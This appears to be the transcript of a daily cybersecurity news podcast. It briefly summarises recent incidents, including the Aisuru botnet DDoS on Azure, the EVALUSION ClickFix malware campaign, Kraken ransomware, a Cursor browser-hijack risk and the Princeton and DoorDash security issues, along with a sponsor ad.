In today’s cybersecurity news…
Azure hit by DDoS using 500K IPs
Microsoft reported that its Azure network was hit by a 15.72 Tbps DDoS attack from more than 500,000 IPs, launched by the Aisuru botnet. The attack targeted an Australian IP and peaked at 3.64 billion packets per second using high-rate UDP floods. Aisuru, a Turbo Mirai-class IoT botnet, exploits vulnerable home routers, IP cameras, and DVRs, and has previously conducted record-breaking attacks, including a 22.2 Tbps assault mitigated by Cloudflare. (BleepingComputer)
Kenyan government websites back online
Kenya’s government websites were briefly defaced on November 17th, with white supremacist messages targeting ministries including interior, health, education, energy, labor, and water. The Interior Ministry said the attack, linked to a group calling itself “PCP@Kenya,” was contained quickly, with systems now monitored. This follows a reported cyberattack in Somalia on its e-visa system, potentially exposing data of at least 35,000 travelers. (The Record)
EVALUSION emerges
Researchers identified a new malware campaign, EVALUSION, using ClickFix social engineering to deliver Amatera Stealer and NetSupport RAT. Amatera targets crypto wallets, browsers, messaging apps, FTP clients, and email, using evasion techniques. Attacks trick users into running malicious commands via fake CAPTCHAs, which launch PowerShell scripts that download and execute payloads. The campaign also employs phishing kits to harvest credentials selectively. (The Hacker News)
Kraken enhances ransomware attacks
Cisco Talos says ransomware group Kraken has been running big attacks across Windows, Linux and ESXi since February. The group now benchmarks each victim system before encrypting files so it can pick the fastest method without crashing the machine or triggering defenses. Talos observed intrusions using exposed SMB services for entry, Cloudflare for persistence and SSHFS for data theft, with ransom demands around $1 million. Kraken lists victims in multiple countries including the US, UK, Canada, and its new “Last Haven” forum appears to be a collaborative space supported by former HelloKitty operators. (Infosecurity Magazine)
Huge thanks to our episode sponsor, KnowBe4
That’s why there’s KnowBe4’s Cloud Email Security platform. It’s not just another filter—it’s a dynamic, AI-powered layer of defense that detects and stops advanced threats before they reach your users’ inbox.
Request a demo of KnowBe4’s Cloud Email Security at knowbe4.com or visit them this week at Microsoft Ignite booth #5532.
Cursor paves way for credential-stealing attacks
Cursor’s AI-powered developer environment lets attackers hijack its internal browser to steal credentials. Knostic researchers found Cursor doesn’t validate certain runtime components, allowing a malicious MCP server to inject JavaScript, overwrite login pages, and run code across all browser tabs. Cursor says this isn’t a fixable bug, but a risk of how AI coding tools work. Users are warned to review code and avoid auto-run features. (Dark Reading)
Overconfidence is the new zero-day
A new report from Immersive shows cybersecurity teams are overconfident but underprepared. Across 1.8 million simulated exercises, participants averaged 22% accuracy and took 29 hours to contain infections. Readiness scores have flatlined since 2023, with many teams practicing outdated scenarios and excluding non-technical roles, which undermines coordination. Confidence often exceeds actual skill, and metrics like training completion mask capability gaps. The report urges orgs to shift from assumption-based confidence to evidence-backed readiness, continuously testing skills against evolving threats including AI-enabled attacks. (The Register)
Princeton University database breached
Princeton University says a database holding donor, alumni, student, faculty and parent information was accessed on November 10th. The intruder was in the system for under a day and it’s unclear what was viewed, but the database stores names, contact details and donation records. It typically does not include Social Security numbers, financial data or student records covered by federal privacy law. No other systems appear to have been touched. (The Record)
DoorDash email spoof sparks dispute
DoorDash patched a flaw that let anyone with a free DoorDash for Business account send fully branded emails from no-reply@doordash.com, creating a phishing vector. The researcher who found it says the issue sat unaddressed for more than 15 months and was only fixed after he applied pressure, while DoorDash accuses him of attempting extortion and banned him from its bug bounty program. The now-resolved bug didn’t appear to expose user data. (BleepingComputer)
CISA plans hiring spree to rebuild depleted ranks
CISA plans a major hiring push in 2026 to recover from prior staffing cuts and strengthen defenses against China-related threats. Acting director Madhu Gottumukkala cited a roughly 40% vacancy rate in critical mission areas and said the agency will prioritize state cybersecurity coordinators, regional advisers, and talent through DHS’s Cyber Talent Management System. CISA plans to offer more flexible work options, expand university partnerships, reinvigorate internships, and recruit Scholarship for Service graduates to restore operational capacity and mission readiness. (Cybersecurity Dive)